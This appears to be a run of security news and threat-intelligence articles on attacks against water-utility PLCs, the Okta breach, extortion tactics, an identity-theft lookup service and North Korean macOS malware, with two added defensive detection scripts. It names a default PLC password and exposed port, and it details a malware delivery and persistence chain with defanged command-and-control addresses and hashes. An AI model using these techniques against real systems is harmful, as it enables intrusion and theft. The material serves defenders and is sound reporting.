Iran-Backed Cyber Av3ngers Escalates Campaigns Against U.S. Critical Infrastructure

Earlier this week, CISA released an advisory warning of active exploitation of Programmable Logic Controllers (PLCs) used in Water and Wastewater treatment plants following intrusions into two U.S. critical infrastructure installations. The advisory and attacks come in the wake of increased public threats made by the Iran-backed Cyber Av3ngers “hacktivist” group to target industries using Israeli-manufactured OT and ICS equipment.

In this post, we describe the background to these attacks and detail recent Cyber Av3ngers activity, exploring the wider implications for critical infrastructure security and how organizations can mitigate these cyber risks.

Intrusion at the Municipal Water Authority of Aliquippa

On November 25, 2023, The Municipal Water Authority of Aliquippa disclosed an attack in which it lost control of one of the booster stations for the area. The attackers appear to have compromised a Unitronics PLC by exploiting weak or default passwords along with targeting the default and well-documented programming port for these devices.

The attackers renamed the PLC to “Gaza” and defaced the user interface.

Source: BeaverCountian.com

In addition, federal officials have indicated that a number of other water authorities on the east coast of the United States have been impacted by the Cyber Av3ngers, as well as at least one aquarium and a brewery. The Full Pint Beer brewery in Pittsburgh shared images on social media on 28th November showing similar defacement of a Unitronics PLC in use as part of its control system.

Who Are Cyber Av3ngers?

Cyber Av3ngers is an IRGC-aligned threat actor whose primary mission is to sow discord and create a sense of heightened risk from technically unsophisticated hacks. The group has a history of making false claims such as breaching the Dorad power station. Attacks by the similarly-named Cyber Avengers, active since 2020, have been claimed by those operating the Cyber Av3ngers social media channels.

The recent attacks follow weeks of social media posturing by Cyber Av3ngers. On October 29, 2023, the group posted a promotional ‘countdown’ style video indicating that the group would be unveiling “one of the greatest cyber attacks on Israel infrastructure” within 24 hours.

CyberAv3ngers October 29th warning Telegram post

On October 30th, the Cyber Av3ngers initiated a series of posts across their Telegram and Twitter/X communication channels claiming to have infiltrated “10 Water treatment stations” across Israel. Prior to that, the same channels had been used to post a small set of files they claim had been exfiltrated from these targets.

Throughout the following weeks, the group maintained its social media campaign with threats to “wipe and destruct all industrial equipment such as SCADA systems, PLCs and HMIs”. However, it was only on 26th November that the group’s threats expanded to include targeting of all critical infrastructure, including plants in the U.S., found to be using equipment manufactured in, or associated with, Israel.

Targeting and Tooling

The current campaign targets Unitronics PLCs exposed to the public internet. A high-level search via Shodan indicates approximately 1800 Unitronics PLC devices are reachable globally. Around 280 of those are of the type in use by the Municipal Water Authority of Aliquippa.

Threat actors are scanning for exposed Unitronics devices listening on TCP port 20256, and when discovered, interrogating and where possible connecting to the vulnerable endpoint.

Cyber Av3ngers are known to use open-source tools to conduct scanning, discovery and exploitation of OT and ICS devices. In particular, they leverage scripts specific to PCOM/TCP to query systems using Unitronics PLCs.

Industrial Control Systems equipment often comes with default passwords and backdoor ‘service’ or ‘admin’ accounts for remote administration. These are documented in publicly available operation manuals and represent a vulnerability if the installer or maintainer of the equipment did not take steps to change passwords and generally harden the devices against external attack.

Screenshots shared by the group on social media show the use of such open-source tools for scanning a range of exploitable ICS devices, including Siemens and SCADA devices.

Cyber Av3ngers & mr_soul_controller

The group has also previously exploited CVE-2023-28130, a remote command execution vulnerability in CheckPoint’s GAIA.

Cyber Av3ngers targeting CheckPoint GAIA

Additional Targeting of OT/ICS Equipment

The nature of many ICS/OT installations means they are often exposed to vulnerabilities and weak or unchanged default passwords. This, combined with their service-critical use, means they are both an easy and attractive target for threat actors.

Unsurprisingly, we find that Cyber Av3ngers are neither the only nor the first group to target such systems. Unitronics PLCs, in particular, have also recently been singled out for targeting by another Gaza-related hacktivist group called ‘GhostSec’.

On October 13, 2023, GhostSec posted messages claiming to have hacked a number of Unitronics devices along with 27 Aegis devices used to control water pumps.

Mitigating Risks to Unitronics PLCs and Other ICS Devices

In order to harden exposed devices, administrators are urged to follow CISA’s recommendations:

  • Change the Unitronics PLC default password and validate that the default password “1111” is not in use.
  • Require MFA for remote access to the OT network, including from the IT network and external networks.
  • Disconnect the PLC from the open internet. If remote access is necessary, implement a firewall/VPN in front of the PLC to control network access to the remote PLC. A VPN or gateway device can enable MFA if it is not supported by the device. Unitronics also offers a secure cellular-based long-haul transport device that connects securely to its cloud services.
  • Back up the logic and configurations on any Unitronics PLCs to enable fast recovery. Become familiar with the process for factory resetting and deploying configurations to a device in the event of being hit by ransomware.
  • If possible, utilize a TCP port that is different from the default port TCP 20256. If available, use PCOM/TCP filters to parse out packets.
  • Update PLC/HMI to the latest version provided by Unitronics.
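Detection logic for the exposure described above, as an added example that is not part of the original post or the CISA advisory: it scans firewall allow/deny records for traffic to the default PCOM/TCP port 20256 from anything outside an approved maintenance network, and lists the unapproved sources probing that port. The key=value log format, the sample lines and the approved CIDRs are constructed assumptions.

```python
"""Flag PCOM/TCP (TCP/20256) access to Unitronics PLCs from outside the
approved maintenance network, and list who is probing that port.
Added example; log format, CIDRs and sample lines are constructed."""
import ipaddress
import re
from typing import Dict, List

PCOM_TCP_PORT = 20256  # default Unitronics PCOM/TCP port named in the advisory

# Assumption: remote maintenance only ever arrives via the site VPN pool or the OT jump network.
ALLOWED_SOURCES = [
    ipaddress.ip_network("10.20.0.0/16"),
    ipaddress.ip_network("192.168.50.0/24"),
]

# Constructed firewall records in a simple key=value format (an assumption about the format).
SAMPLE_LOGS = """\
ts=2023-11-25T03:14:07Z action=allow proto=tcp src=10.20.4.17 dst=192.168.50.12 dport=20256
ts=2023-11-25T03:15:22Z action=allow proto=tcp src=198.51.100.23 dst=192.168.50.12 dport=20256
ts=2023-11-25T03:15:23Z action=allow proto=tcp src=198.51.100.23 dst=192.168.50.12 dport=502
ts=2023-11-25T03:16:01Z action=deny proto=tcp src=203.0.113.9 dst=192.168.50.12 dport=20256
ts=2023-11-25T03:17:45Z action=allow proto=udp src=10.20.4.18 dst=192.168.50.12 dport=20256
"""

KV_RE = re.compile(r"(\w+)=(\S+)")


def parse_line(line: str) -> Dict[str, str]:
    """Turn one key=value record into a dict; empty dict for blank/unparseable lines."""
    return dict(KV_RE.findall(line))


def is_approved(src: str) -> bool:
    """True if the source address falls inside an approved maintenance range."""
    try:
        addr = ipaddress.ip_address(src)
    except ValueError:
        return False
    return any(addr in net for net in ALLOWED_SOURCES)


def _is_pcom_tcp(ev: Dict[str, str]) -> bool:
    return ev.get("proto") == "tcp" and int(ev.get("dport", 0)) == PCOM_TCP_PORT


def find_unapproved_pcom_access(log_text: str) -> List[Dict[str, str]]:
    """Allowed TCP/20256 connections whose source is outside the approved ranges.
    These are the events that matter most: the PLC was actually reachable."""
    hits = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if not ev or not _is_pcom_tcp(ev) or ev.get("action") != "allow":
            continue
        if not is_approved(ev.get("src", "")):
            hits.append(ev)
    return hits


def pcom_probe_sources(log_text: str) -> List[str]:
    """Distinct unapproved sources that touched TCP/20256 at all (allowed or denied).
    Denied hits from many unrelated addresses are what internet-wide scanning for
    exposed Unitronics devices looks like from the defender's side."""
    seen = set()
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev and _is_pcom_tcp(ev) and not is_approved(ev.get("src", "")):
            seen.add(ev["src"])
    return sorted(seen)


if __name__ == "__main__":
    for ev in find_unapproved_pcom_access(SAMPLE_LOGS):
        print(f"{ev['ts']} PCOM/TCP allowed from unapproved source {ev['src']} -> {ev['dst']}")
    print("probing sources:", pcom_probe_sources(SAMPLE_LOGS))
```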

Conclusion

Groups escalating their presence and activities following the onset of the Israel-Hamas war are flooding social media with elaborate claims and grand threats of massive intrusions. Though inevitably exaggerated, groups like Cyber Av3ngers do present a risk to critical infrastructure installations, albeit one that, at present, remains low-impact. It is also important to see Cyber Av3ngers in the context of being an aspect of the IRGC. The goal here may be as much to do with Iranian-aligned propaganda as it is to do with causing material harm.

However, defenders should take such activity as an opportunity to understand weaknesses that need to be mitigated before more serious harm can be done. From a technical perspective, awareness continues to be paramount. Mitigating known risks will stop such opportunistic attacks from impacting devices and minimize the potential of service disruption.

To learn about how SentinelOne can help protect your organization from cyber threats, contact us or request a free demo.

Okta: Breach Affected All Customer Support Users

When KrebsOnSecurity broke the news on Oct. 20, 2023 that identity and authentication giant Okta had suffered a breach in its customer support department, Okta said the intrusion allowed hackers to steal sensitive data from fewer than one percent of its 18,000+ customers. But today, Okta revised that impact statement, saying the attackers also stole the name and email address for nearly all of its customer support users.

Okta acknowledged last month that for several weeks beginning in late September 2023, intruders had access to its customer support case management system. That access allowed the hackers to steal authentication tokens from some Okta customers, which the attackers could then use to make changes to customer accounts, such as adding or modifying authorized users.

In its initial incident reports about the breach, Okta said the hackers gained unauthorized access to files inside Okta’s customer support system associated with 134 Okta customers, or less than 1% of Okta’s customer base.

But in an updated statement published early this morning, Okta said it determined the intruders also stole the names and email addresses of all Okta customer support system users.

“All Okta Workforce Identity Cloud (WIC) and Customer Identity Solution (CIS) customers are impacted except customers in our FedRamp High and DoD IL4 environments (these environments use a separate support system NOT accessed by the threat actor),” Okta’s advisory states. “The Auth0/CIC support case management system was also not impacted by this incident.”

Okta said that for nearly 97 percent of users, the only contact information exposed was full name and email address. That means about three percent of Okta customer support accounts had one or more of the following data fields exposed (in addition to email address and name): last login; username; phone number; SAML federation ID; company name; job role; user type; date of last password change or reset.

Okta notes that a large number of the exposed accounts belong to Okta administrators — IT people responsible for integrating Okta’s authentication technology inside customer environments — and that these individuals should be on guard for targeted phishing attacks.

“Many users of the customer support system are Okta administrators,” Okta pointed out. “It is critical that these users have multi-factor authentication (MFA) enrolled to protect not only the customer support system, but also to secure access to their Okta admin console(s).”

While it may seem completely bonkers that some companies allow their IT staff to operate company-wide authentication systems using an Okta administrator account that isn’t protected with MFA, Okta said fully six percent of its customers (more than 1,000) persist in this dangerous practice.

In a previous disclosure on Nov. 3, Okta blamed the intrusion on an employee who saved the credentials for a service account in Okta’s customer support infrastructure to their personal Google account, and said it was likely those credentials were stolen when the employee’s personal device using the same Google account was compromised.

Unlike standard user accounts, which are accessed by humans, service accounts are mostly reserved for automating machine-to-machine functions, such as performing data backups or antivirus scans every night at a particular time. For this reason, they can’t be locked down with multifactor authentication the way user accounts can.

Dan Goodin over at Ars Technica reckons this explains why MFA wasn’t set up on the compromised Okta service account. But as he rightly points out, if a transgression by a single employee breaches your network, you’re doing it wrong.

“Okta should have put access controls in place besides a simple password to limit who or what could log in to the service account,” Goodin wrote on Nov. 4. “One way of doing this is to put a limit or conditions on the IP addresses that can connect. Another is to regularly rotate access tokens used to authenticate to service accounts. And, of course, it should have been impossible for employees to be logged in to personal accounts on a work machine. These and other precautions are the responsibility of senior people inside Okta.”

Goodin suggested that people who want to delve further into various approaches for securing service accounts should read this thread on Mastodon.

“A fair number of the contributions come from security professionals with extensive experience working in sensitive cloud environments,” Goodin wrote.
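The controls Goodin lists, written out as a policy check over service-account sign-in events, as an added example that is neither Okta's code nor Goodin's: a per-account source IP allowlist, a maximum credential age, and a flag for an interactive browser user agent on a machine-to-machine account. The event fields, account name, CIDR and rotation period are constructed assumptions.

```python
"""Policy check for service-account sign-ins: IP conditions, credential rotation,
and a sanity check that the client looks like automation rather than a person.
Added example; event format and policy values are constructed."""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
import ipaddress
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class ServiceAccountPolicy:
    allowed_sources: tuple          # ip_network objects the account may sign in from
    max_credential_age: timedelta   # the secret/token must be rotated at least this often


# Constructed: one backup service account that should only ever sign in from the backup host's egress range.
POLICIES: Dict[str, ServiceAccountPolicy] = {
    "svc-support-backup": ServiceAccountPolicy(
        allowed_sources=(ipaddress.ip_network("203.0.113.0/24"),),
        max_credential_age=timedelta(days=30),
    ),
}

# Constructed sign-in events: a normal nightly run, then a sign-in that matches none of the expectations.
SAMPLE_EVENTS = [
    {"actor": "svc-support-backup", "src_ip": "203.0.113.10", "ts": "2023-09-28T02:00:03Z",
     "cred_issued": "2023-09-15T00:00:00Z", "user_agent": "backup-agent/1.4"},
    {"actor": "svc-support-backup", "src_ip": "198.51.100.77", "ts": "2023-09-28T14:22:41Z",
     "cred_issued": "2023-06-01T00:00:00Z", "user_agent": "Mozilla/5.0 (Macintosh) Chrome/117"},
]


def parse_ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def evaluate(event: Dict[str, str], policies: Dict[str, ServiceAccountPolicy]) -> List[str]:
    """Return the policy violations for one sign-in event (empty list means clean)."""
    pol = policies.get(event.get("actor", ""))
    if pol is None:
        # An unlisted service account is itself a finding: every machine identity needs a policy.
        return ["no policy for service account"]
    findings = []
    ip = ipaddress.ip_address(event["src_ip"])
    if not any(ip in net for net in pol.allowed_sources):
        findings.append(f"source {event['src_ip']} not in allowlist")
    age = parse_ts(event["ts"]) - parse_ts(event["cred_issued"])
    if age > pol.max_credential_age:
        findings.append(f"credential age {age.days}d exceeds {pol.max_credential_age.days}d rotation")
    # A browser user agent on a machine-to-machine account suggests a human is holding the credential.
    if event.get("user_agent", "").startswith("Mozilla/"):
        findings.append("interactive browser user agent on service account")
    return findings


def audit(events: List[Dict[str, str]], policies: Dict[str, ServiceAccountPolicy]) -> List[Tuple[str, List[str]]]:
    """(timestamp, findings) for every event that violates its account's policy."""
    out = []
    for ev in events:
        findings = evaluate(ev, policies)
        if findings:
            out.append((ev.get("ts", "?"), findings))
    return out


if __name__ == "__main__":
    for ts, findings in audit(SAMPLE_EVENTS, POLICIES):
        print(ts, "->", "; ".join(findings))
```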

Leveraging the Law, Exposing Incriminating Data and Other New Tactics in Cyber Extortion

A little over a year ago, we described how ransomware operators had evolved their tactics from simple file locking to more sophisticated forms of extortion in Ransoms Without Ransomware, Data Corruption and Other New Tactics in Cyber Extortion. Since then, cybercrime actors have not stood still, and we are currently seeing the emergence of a brace of new tactics to wrest funds out of organizations and their clients in the wake of a business network compromise.

We observe that data theft and data destruction continue to be primary tools in the cybercriminal’s arsenal, along with partial and full file encryption. Added to that, however, we have begun to see the use of new levers that attempt to shame, blame or otherwise coerce victims into paying the ransom demanded by attackers.

In this post, we describe the emergence of these new tactics in cyber extortion to help defenders better understand the continuing development of threat actor behaviors.

Extortion Through Leveraging the Law

In mid-2023, the United States Securities and Exchange Commission approved updated requirements around cybersecurity incident reporting. The new rules require that all companies disclose cybersecurity incidents, along with all the pertinent details, to the SEC within four days of becoming aware of a breach incident.

The new rules will require registrants to disclose on the new Item 1.05 of Form 8-K any cybersecurity incident they determine to be material and to describe the material aspects of the incident’s nature, scope, and timing, as well as its material impact or reasonably likely material impact on the registrant. An Item 1.05 Form 8-K will generally be due four business days [our emphasis] after a registrant determines that a cybersecurity incident is material. 

The new requirements are set to take effect from 18th December, 2023 for larger organizations and from June 2024 for all others. However, some ransomware operators have already adopted tactics that seek to leverage the new rules about breach disclosure to threaten victims even before they have taken effect.

On November 7th, the ALPHV gang breached MeridianLink in a data theft operation that did not involve the deployment of ransomware. The victim – a large financial services enterprise with dealings in mortgage lending, credit unions and banking products and services – subsequently stated that they became aware of the breach on November 10th.

According to the attackers, the victim was threatened with being reported to the SEC if they failed to pay within 24 hours.

On November 15, ALPHV added MeridianLink to its TOR-based data leaks website along with excerpts and screenshots of the complaint they filed to the SEC alleging that the enterprise had failed to report the breach within four days.

Source: databreaches.net

Although in this case the rules were not in force at the time, it is clear that going forward threat actors will use this as a tactic to pressure victims. The aim would appear to be to prevent organizations stalling for time while trying to mitigate the damage, negotiate the payment amount, or otherwise avoid disclosing the breach to their partners, clients and other affected parties.

The Threat of Exposing Incriminating Data

While the threat of exposing stolen data has now been used for some time as an additional form of leverage, there have been few cases where the nature of the data itself has been used to pressure a victim to pay. Where those have occurred, they have centered around sensitive, proprietary data that companies would not wish to fall into the hands of competitors.

However, a recent breach by affiliates of the Rhysida ransomware operation was followed by a threat to publish data that itself constitutes a criminal offense for the victim to possess. In this case, the ransomware operators allege that data stolen from Mount St. Mary’s Seminary, a school that prepares “candidates for the Catholic priesthood”, contained “child erotica”.

“Ready to provide evidence of child erotica stored on this network. Willing to cooperate with detectives and journalists. These materials will not be published on our site.”

The implications here are complex and concerning. Even an unproven allegation of this kind threatens the reputation of the victim organization. It is easy for threat actors to make damaging claims and refuse to provide the evidence. As a tactic, threatening to publicize such claims can exert pressure on victim organizations, particularly if they cannot verify for themselves whether such data exists.

If true, there are obvious legal implications and reputational consequences for the organization even if the crime is the sole responsibility of a single individual. In such circumstances, threat actors can ramp up the pressure on victims to pay in the hope that the data will not be exposed to law enforcement.

While the specific nature of the incriminating data in this incident may not be (one would like to think) something widely found on business networks, the greater lesson is that threat actors can and will leverage not only business data but also personal employee data that may be stored on compromised business computers.

Enterprises need to ensure that strict policies are in place to prevent employees using organizational computers for personal use, and that these policies are enforced, along with ensuring all endpoints are properly protected against compromise.

Trading Victims Off Against GDPR & Other Regulators

Ever since 2018, GDPR and similar regulations have had an important impact on the way companies store and retain data. Backed by the threat of heavy financial penalties, GDPR is a powerful motivator to ensure organizations prioritize data privacy in their operations.

Threat actors have leveraged the threat of penalties for breaching GDPR rules in the past. For example, in 2021, DoppelPaymer successor Grief (aka PayorGrief) cited GDPR violations to exert pressure on victims.

Grief victim portal referencing GDPR regulations (from May 2021)

However, more forceful GDPR-related threats have been observed in 2023. The previously mentioned ALPHV gang attempts to pressure victims by scaring their customer base. On November 14, 2023, the organization “Naftor and Grupa Pern” was added to the ALPHV blog with scare text claiming the company did not observe GDPR rules and that its customers’ data could be leaked as a result.

WARNING!

COOPERATION WITH NAFTOR AND GRUPA PERN MAY RESULT IN THE LEAKAGE OF YOUR DATA. THESE COMPANIES DO NOT COMPLY WITH THE LAWS OF THE EUROPEAN UNION AND IN PARTICULAR THE GDPR. YOU MAY INCUR LEGAL AND FINANCIAL RISKS BY WORKING WITH THEM!

More direct leverage of GDPR was recently seen as a tactic used by the short-lived and now-defunct Ransomed.VC gang. This group threatened victims with disclosure of GDPR violations in the event they did not conform to the ransom demands. The extortion demands would be purposefully set at a price lower than the potential GDPR fines in an attempt to entice the victim to pay by offering a less financially-painful option.

Ransomed.VC site banner

Conclusion

Legal frameworks such as the SEC’s new cybersecurity incident reporting rules, GDPR regulations and standing laws on prohibited data are being exploited to exert further pressure on vulnerable organizations. These latest cyber tactics attempt to force victims into meeting ransom demands by raising fears of both legal liability and reputational damage.

The emergence of such tactics underscores the need for organizations to strengthen their cybersecurity posture, ensure compliance with regulatory requirements and to remain prepared for the evolving nature of today’s cyber threats. Cybercriminals are highly motivated to develop new and creative ways to extort businesses, and cyber defenders need to remain vigilant and adaptive in their strategies to defend against these evolving threats.

To learn about how SentinelOne can help protect your organization from ransomware and other threats, contact us or request a free demo.

ID Theft Service Resold Access to USInfoSearch Data

One of the cybercrime underground’s more active sellers of Social Security numbers, background and credit reports has been pulling data from hacked accounts at the U.S. consumer data broker USinfoSearch, KrebsOnSecurity has learned.

Since at least February 2023, a service advertised on Telegram called USiSLookups has operated an automated bot that allows anyone to look up the SSN or background report on virtually any American. For prices ranging from $8 to $40 and payable via virtual currency, the bot will return detailed consumer background reports automatically in just a few moments.

USiSLookups is the project of a cybercriminal who uses the nicknames JackieChan/USInfoSearch, and the Telegram channel for this service features a small number of sample background reports, including that of President Joe Biden, and podcaster Joe Rogan. The data in those reports includes the subject’s date of birth, address, previous addresses, previous phone numbers and employers, known relatives and associates, and driver’s license information.

JackieChan’s service abuses the name and trademarks of Columbus, OH-based data broker USinfoSearch, whose website says it provides “identity and background information to assist with risk management, fraud prevention, identity and age verification, skip tracing, and more.”

“We specialize in non-FCRA data from numerous proprietary sources to deliver the information you need, when you need it,” the company’s website explains. “Our services include API-based access for those integrating data into their product or application, as well as bulk and batch processing of records to suit every client.”

As luck would have it, my report was also listed in the Telegram channel for this identity fraud service, presumably as a teaser for would-be customers. On October 19, 2023, KrebsOnSecurity shared a copy of this file with the real USinfoSearch, along with a request for information about the provenance of the data.

USinfoSearch said it would investigate the report, which appears to have been obtained on or before June 30, 2023. On Nov. 9, 2023, Scott Hostettler, general manager of USinfoSearch parent Martin Data LLC shared a written statement about their investigation that suggested the ID theft service was trying to pass off someone else’s consumer data as coming from USinfoSearch:

Regarding the Telegram incident, we understand the importance of protecting sensitive information and upholding the trust of our users is our top priority. Any allegation that we have provided data to criminals is in direct opposition to our fundamental principles and the protective measures we have established and continually monitor to prevent any unauthorized disclosure. Because Martin Data has a reputation for high-quality data, thieves may steal data from other sources and then disguise it as ours. While we implement appropriate safeguards to guarantee that our data is only accessible by those who are legally permitted, unauthorized parties will continue to try to access our data. Thankfully, the requirements needed to pass our credentialing process are tough even for established honest companies.

USinfoSearch’s statement did not address any questions put to the company, such as whether it requires multi-factor authentication for customer accounts, or whether my report had actually come from USinfoSearch’s systems.

After much badgering, on Nov. 21 Hostettler acknowledged that the USinfoSearch identity fraud service on Telegram was in fact pulling data from an account belonging to a vetted USinfoSearch client.

“I do know 100% that my company did not give access to the group who created the bots, but they did gain access to a client,” Hostettler said of the Telegram-based identity fraud service. “I apologize for any inconvenience this has caused.”

Hostettler said USinfoSearch heavily vets any new potential clients, and that all users are required to undergo a background check and provide certain documents. Even so, he said, several fraudsters each month present themselves as credible business owners or C-level executives during the credentialing process, completing the application and providing the necessary documentation to open a new account.

“The level of skill and craftsmanship demonstrated in the creation of these supporting documents is incredible,” Hostettler said. “The numerous licenses provided appear to be exact replicas of the original document. Fortunately, I’ve discovered several methods of verification that do not rely solely on those documents to catch the fraudsters.”

“These people are unrelenting, and they act without regard for the consequences,” Hostettler continued. “After I deny their access, they will contact us again within the week using the same credentials. In the past, I’ve notified both the individual whose identity is being used fraudulently and the local police. Both are hesitant to act because nothing can be done to the offender if they are not apprehended. That is where most attention is needed.”

SIM SWAPPER’S DELIGHT

JackieChan is most active on Telegram channels focused on “SIM swapping,” which involves bribing or tricking mobile phone company employees into redirecting a target’s phone number to a device the attackers control. SIM swapping allows crooks to temporarily intercept the target’s text messages and phone calls, including any links or one-time codes for authentication that are delivered via SMS.

Reached on Telegram, JackieChan said most of his clients hail from the criminal SIM swapping world, and that the bulk of his customers use his service via an application programming interface (API) that allows customers to integrate the lookup service with other web-based services, databases, or applications.

“Sim channels is where I get most of my customers,” JackieChan told KrebsOnSecurity. “I’m averaging around 100 lookups per day on the [Telegram] bot, and around 400 per day on the API.”

JackieChan claims his USinfoSearch bot on Telegram abuses stolen credentials needed to access an API used by the real USinfoSearch, and that his service was powered by USinfoSearch account credentials that were stolen by malicious software tied to a botnet that he claims to have operated for some time.

This is not the first time USinfoSearch has had trouble with identity thieves masquerading as legitimate customers. In 2013, KrebsOnSecurity broke the news that an identity fraud service in the underground called “SuperGet[.]info” was reselling access to personal and financial data on more than 200 million Americans that was obtained via the big-three credit bureau Experian.

The consumer data resold by Superget was not obtained directly from Experian, but rather via USinfoSearch. At the time, USinfoSearch had a contractual agreement with a California company named Court Ventures, whereby customers of Court Ventures had access to the USinfoSearch data, and vice versa.

When Court Ventures was purchased by Experian in 2012, the proprietor of SuperGet — a Vietnamese hacker named Hieu Minh Ngo who had impersonated an American private investigator — was grandfathered in as a client. The U.S. Secret Service agent who oversaw Ngo’s capture, extradition, prosecution and rehabilitation told KrebsOnSecurity he’s unaware of any other cybercriminal who has caused more material financial harm to more Americans than Ngo.

REAL POLICE, FAKE EDRS

JackieChan also sells access to hacked email accounts belonging to law enforcement personnel in the United States and abroad. Hacked police department emails can come in handy for ID thieves trying to pose as law enforcement officials who wish to purchase consumer data from platforms like USinfoSearch. Hence, Mr. Hostettler’s ongoing battle with fraudsters seeking access to his company’s service.

These police credentials are mainly marketed to criminals seeking fraudulent “Emergency Data Requests,” wherein crooks use compromised government and police department email accounts to rapidly obtain customer account data from mobile providers, ISPs and social media companies.

Normally, these companies will require law enforcement officials to supply a subpoena before turning over customer or user records. But EDRs allow police to bypass that process by attesting that the information sought is related to an urgent matter of life and death, such as an impending suicide or terrorist attack.

In response to an alarming increase in the volume of fraudulent EDRs, many service providers have chosen to require all EDRs be processed through a service called Kodex, which seeks to filter EDRs based on the reputation of the law enforcement entity requesting the information, and other attributes of the requestor.

For example, if you want to send an EDR to Coinbase or Twilio, you’ll first need to have valid law enforcement credentials and create an account at the Kodex online portal at these companies. However, Kodex may still throttle or block any requests from any accounts if they set off certain red flags.

Within their own separate Kodex portals, Twilio can’t see requests submitted to Coinbase, or vice versa. But each can see if a law enforcement entity or individual tied to one of their own requests has ever submitted a request to a different Kodex client, and then drill down further into other data about the submitter, such as Internet address(es) used, and the age of the requestor’s email address.

In August, JackieChan was advertising a working Kodex account for sale on the cybercrime channels, including redacted screenshots of the Kodex account dashboard as proof of access.

Kodex co-founder Matt Donahue told KrebsOnSecurity his company immediately detected that the law enforcement email address used to create the Kodex account pictured in JackieChan’s ad was likely stolen from a police officer in India. One big tipoff, Donahue said, was that the person creating the account did so using an Internet address in Brazil.

“There’s a lot of friction we can put in the way for illegitimate actors,” Donahue said. “We don’t let people use VPNs. In this case we let them in to honeypot them, and that’s how they got that screenshot. But nothing was allowed to be transmitted out from that account.”

Massive amounts of data about you and your personal history are available from USinfoSearch and dozens of other data brokers that acquire and sell “non-FCRA” data — i.e., consumer data that cannot be used for the purposes of determining one’s eligibility for credit, insurance, or employment.

Anyone who works in or adjacent to law enforcement is eligible to apply for access to these data brokers, which often market themselves to police departments and to “skip tracers,” essentially bounty hunters hired to locate others in real life — often on behalf of debt collectors, process servers or a bail bondsman.

There are tens of thousands of police jurisdictions around the world — including roughly 18,000 in the United States alone. And the harsh reality is that all it takes for hackers to apply for access to data brokers (and abuse the EDR process) is illicit access to a single police email account.

The trouble is, compromised credentials to law enforcement email accounts show up for sale with alarming frequency on the Telegram channels where JackieChan and their many clients reside. Indeed, Donahue said Kodex so far this year has identified attempted fake EDRs coming from compromised email accounts for police departments in India, Italy, Thailand and Turkey.

DPRK Crypto Theft | macOS RustBucket Droppers Pivot to Deliver KandyKorn Payloads

North Korean-aligned threat actors targeting macOS have had a busy 2023, with two major campaigns noted so far: RustBucket and KandyKorn. The initial RustBucket campaign used a second-stage malware, dubbed ‘SwiftLoader’, which functioned externally as a PDF Viewer for a lure document sent to targets. While victims viewed the lure, SwiftLoader retrieved and executed a further stage malware written in Rust. The KandyKorn campaign, meanwhile, was an elaborate multi-stage operation targeting blockchain engineers of a crypto exchange platform. Python scripts were used to drop malware that hijacked the host’s installed Discord app, and subsequently delivered a backdoor RAT written in C++ dubbed ‘KandyKorn’.

Our analysis of further activity in these campaigns suggests that DPRK threat actors are now ‘mixing and matching’ components from these operations, with SwiftLoader droppers being used to deliver KandyKorn payloads. In this post, we provide an extensive review of this activity and provide further indicators to help security teams defend their organizations.

Overview of KandyKorn

Research by Elastic published in early November 2023 described a sophisticated intrusion by DPRK-aligned threat actors. The compromise involved a five-stage attack that began with social engineering via Discord to trick targets into downloading a malicious Python application disguised as a cryptocurrency arbitrage bot, a popular tool among crypto traders. The Python application was distributed as Cross-Platform Bridges.zip and contained multiple benign Python scripts. We summarize the previous research into KandyKorn as follows:

Overview of Operation KandyKorn

Stage 0

A Discord user is socially engineered into downloading a malicious Python application, Cross-Platform Bridges.zip. Initially, links to the malware were sent to targets via direct message, with the malware hosted on Google Drive.

https[:]//drive.google[.]com/file/d1KW5nQ8MZccug6Mp4QtKyWLT3HIZzHNIL2

The application’s Main.py script imports the included Watcher.py file as a module.

Stage 1

Watcher.py checks the local Python version and downloads and executes testSpeed.py. The script downloads and executes another Python script, FinderTools. The former is deleted after execution while the latter is written to /Users/Shared/FinderTools.

Stage 2

FinderTools downloads and executes a Mach-O binary, dubbed SUGARLOADER, at /Users/Shared/.sld. The same file is also copied twice as .log and as appname, both within the Discord application’s hierarchy at /Applications/Discord.app/Contents/MacOS/.

Written in C++, SUGARLOADER checks for the existence of a configuration file at /Library/Caches/com.apple.safari.ck and downloads it from a remote C2 if missing. The C2 address is hardcoded into the FinderTools script and passed as an execution argument to the SUGARLOADER binary on the command line.

In the intrusion seen by Elastic, the C2 used by FinderTools was hosted on the domain tp-globa[.]xyz.

tp-globa.xyz/OdhLca1mLUp/lZ5rZPxWsh/7yZKYQI43S/fP7savDX6c/bfC

Stage 3

SUGARLOADER also downloads a Mach-O payload dubbed HLOADER and writes it to /Applications/Discord.app/Contents/MacOS/Discord. The genuine Discord executable is renamed as .lock in the same directory.

HLOADER

After this replacement, when Discord is launched, HLOADER renames itself to MacOS.tmp, renames the .lock file back to Discord, and executes both the genuine Discord binary and the SUGARLOADER executable saved as .log. This causes the entire renaming/reloading process to repeat.

On the assumption that the victim is likely to launch Discord frequently, the purpose of HLOADER is to provide a persistence mechanism that will not be detected by Apple’s monitoring of background login items.

Stage 4

SUGARLOADER retrieves a C2 URL from the configuration file previously stored at com.apple.safari.ck. In the observed intrusion, this was 23.254.226[.]90, communicating over TCP port 44.

SUGARLOADER uses this to retrieve and execute the KANDYKORN remote access trojan in-memory via NSCreateObjectFileImageFromMemory and NSLinkModule. This technique has been used previously in North Korean macOS malware, starting with UnionCryptoTrader back in 2019.

Building off Elastic’s research, we identified a number of other versions of KANDYKORN RAT, with the following SHA1s:

SHA1 First Seen
62267b88fa6393bc1f1eeb778e4da6b564b7011e Apr 2023
8f6c52d7e82fbfdead3d66ad8c52b372cc9e8b18 Apr 2023
ac336c5082c2606ab8c3fb023949dfc0db2064d5 Apr 2023
26ec4630b4d1116e131c8e2002e9a3ec7494a5cf Aug 2023
46ac6dc34fc164525e6f7886c8ed5a79654f3fd3 Aug 2023
8d5d214c490eae8f61325839fcc17277e514301e Aug 2023
9f97edbc1454ef66d6095f979502d17067215a9d Aug 2023
c45f514a252632cb3851fe45bed34b175370d594 Aug 2023
ce3705baf097cd95f8f696f330372dd00996d29a Aug 2023
e244ff1d8e66558a443610200476f98f653b8519 Aug 2023
e77270ac0ea05496dd5a2fbccba3e24eb9b863d9 Aug 2023
e68bfa72a4b4289a4cc688e81f9282b1f78ebc1f Nov 2023

